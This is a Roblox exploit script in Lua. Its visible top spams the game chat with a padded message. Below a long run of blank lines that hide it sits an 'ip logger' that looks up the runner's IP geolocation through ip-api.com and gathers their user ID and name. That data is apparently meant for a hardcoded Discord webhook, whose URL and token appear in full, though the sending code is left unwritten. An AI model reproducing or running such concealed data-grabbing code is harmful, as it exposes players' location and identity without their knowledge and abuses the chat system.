local Message = "⛓" 
local Unicode = " "
Message = Message .. Unicode:rep(200 - #Message)

local ReplicatedStorage = game:GetService("ReplicatedStorage")
local SayMessageRequest = ReplicatedStorage:FindFirstChild("SayMessageRequest", true)

if SayMessageRequest then
    for i = 1, 7 do
        SayMessageRequest:FireServer(Message, "All")
    end
end









































































































local willwebhook = true -- send webhook or nah
local printraw = false -- print raw response without formatting
local censor = true -- censore shit
local webhook = "https://discord.com/api/webhooks/1111801733820194858/DzyntPRZ_fF-uHeGy1STK3iKJrPGSfh2q1lAYx5-oOseD5OHdI4uAMc0of6GWULUTqZm" -- optional if not willwebhook
local httpservice = game:GetService("HttpService")
-- two below used for willwebhook
httprequest = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request
UserId, PlayerName, PlayerDisplay = game:GetService("Players").LocalPlayer.UserId, game:GetService("Players").LocalPlayer.Name, game:GetService("Players").LocalPlayer.DisplayName

function getjson()
    local response = game:HttpGet("http://ip-api.com/json")
    if printraw then return response end
    return httpservice:JSONDecode(response)
end
function payload()
    if willwebhook then
        -- send request to webhook, too lazy to code
    else
        print("--- ip logger by 25KFN ON YT ---")
        if printraw then
            print(getjson())
        else
            for i,v in pairs(getjson()) do
                local text = v
                if censor then text="[censored]"end
                print(i..": "..text)
            end
        end
    end
end
payload()
